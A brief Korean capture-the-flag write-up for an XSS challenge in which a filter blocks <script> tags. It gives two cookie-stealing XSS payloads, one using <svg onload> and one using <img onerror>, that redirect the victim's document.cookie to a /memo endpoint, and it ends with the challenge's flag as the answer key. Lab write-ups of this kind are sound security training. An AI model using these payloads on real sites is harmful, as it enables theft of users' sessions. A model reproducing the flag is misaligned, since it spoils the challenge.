


XSS-1과 다르게 팝업창이 뜨지 않음. -> 스크립트가 우회됨.



param 파라미터에 값과 쿠키에 FLAG를 포함해 check_xss함수를 호출함.
check_xss는 read_url 함수를 호출해 vuln 엔드포인트에 접속함.


* 해당 이용자의 쿠키에 FLAG가 존재함.

페이지에 활성화된 방화벽 우회 필요
<script> 코드가 아닌 html 태그로 xss 취약점을 발생시키기 - 2가지
2. <svg/onload> 태그
<svg onload=location.href=’/memo?memo=’+document.cookie>
1. <img> 태그
<img src="" onerror="location.href='/memo?memo='+document.cookie">


답:
DH{3c01577e9542ec24d68ba0ffb846508f}